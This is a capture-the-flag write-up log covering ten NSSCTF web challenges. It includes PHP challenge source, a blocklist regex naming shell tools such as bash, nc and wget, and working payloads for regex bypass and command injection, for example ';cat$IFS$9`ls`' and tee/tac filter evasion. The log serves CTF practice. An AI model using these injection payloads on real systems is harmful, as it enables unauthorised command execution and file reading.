NSSCTF's Web chapter brushing record [12]
-
- [NCTF 2018] Check-in questions:
- [Crane City Cup 2021] EasyP:
- [NSSCTF 2022 Spring Recruit]ezgame:
- [GXYCTF 2019]Ping Ping Ping:
- [SWPUCTF 2021 Freshman Competition] finalrce:
- [NISACTF 2022]checkin:
- [UUCTF 2022 Freshman Competition] websign:
- [GDOUCTF 2023]hate eat snake:
- [HNCTF 2022 Week1]2048:
- [HDCTF 2023]Welcome To HDCTF 2023:
NSSCTF platform: https://www.nssctf.cn/
PS: Remember flagto change everything toNSSCTF
[NCTF 2018] Check-in questions:
Opening is a search.phplook at the source code, but I can't find it flag,. Finally, index.phpI found it in the response header!
NSSCTF{w3lc0m3_t0_nctf2018hhhhhhhhhhhh}
[Crane City Cup 2021] EasyP:
<?php
include 'utils.php';
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if ($guess === $secret) {
$message = 'Congratulations! The flag is: ' . $flag;
} else {
$message = 'Wrong. Try Again';
}
}
if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("hacker :)");
}
if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
exit("hacker :)");
}
if (isset($_GET['show_source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}else{
show_source(__FILE__);
}
?>
Analyze the code $_SERVE[‘PHP_SELF’]The path of the called script
$_SERVER[‘REQUEST_URI’]obtains the current URI, that is, the complete address path after the domain name
basenamefunction: Returns the file name part of the path.
Now you need to bypass preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF']and regularize as long as php\you add a non- ascllcode at the end. For example, Chinese characters preg_matchcannot be directly input due to regular matching, show_source=‘’so you can show_sourcechange it to show[source
bypass preg_matchregularity. Add a character that is not in the table index.php/utils.phpafter ascii(many are fine)
payload:/index.php/utils.php/巧克力?show[source=1
NSSCTF{9ce4af3e-811f-49cd-a8f3-544efa897fb9}
[NSSCTF 2022 Spring Recruit]ezgame:
65You flagare given points for playing the game (too lazy to play) jsso let's look for it and js/preload.jsfind it in FLAG.
NSSCTF{c0700f5b-604f-4b8f-b017-4be822fb5de6}
[GXYCTF 2019]Ping Ping Ping:
This question has been mentioned before and you can refer to the link : https://blog.csdn.net/Aluxian_/article/details/130053100?spm=1001.2014.3001.5501
Payload:?ip=127.0.0.1;cat$IFS$9`ls`
NSSCTF{8117affa-f16d-4085-b644-696ae9b83a2c}
[SWPUCTF 2021 Freshman Competition] finalrce:
<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
$url=$_GET['url'];
if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
{
echo "Sorry,you can't use this.";
}
else
{
echo "Can you see anything?";
exec($url);
}
}
preg_matchThe function is used to perform a regular expression match. Here you can see that basically a lot of commands are filtered, cat,lswhich cannot be used. You can use teethe command
Since lsregular expressions are filtered, we also need to bypass the escape character preg_matchwith a backslash(\)
The function here teeis to read from standard input, then write to standard output and files Payload:?url=l\s / |tee 1.txt, and then access 1.txtto seeflllllaaaaaaggggggg
tacIt is not filtered and then directly constructed. Payload:?url=tac /flllll\aaaaaaggggggg | tee 9.txt (Remember | followed by a space) in access9.txt
NSSCTF{9dccd221-4cd1-41f7-9feb-3c463839eb88}
[NISACTF 2022]checkin:
Tip: Try to copy the source code to see ->010editor
Recognize Unicodethe special characters, copy them to VScodethe middle, copy them down and URLencodeencode them
Payload:?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF
NSSCTF{5359287b-d34e-4df8-ac95-1670f011cf2c}
[UUCTF 2022 Freshman Competition] websign:
[GDOUCTF 2023]hate eat snake:
Pass to get the flag or first G a few times and then click cancel, wait for about 60 seconds, and then press the space to get the flag
[HNCTF 2022 Week1]2048:
It's a classic game. Just F12check the source code to find it js, go in and check alert()the output, copy it to the console and run it.
NSSCTF{53160c888e25c3f828b23e316a7ae083}
[HDCTF 2023]Welcome To HDCTF 2023:
If you play the game normally, you will give FLAG, or go to js to find a JSFuckcodec and decode it.
NSSCTF{We13ome_t@_HDCTF_2o23}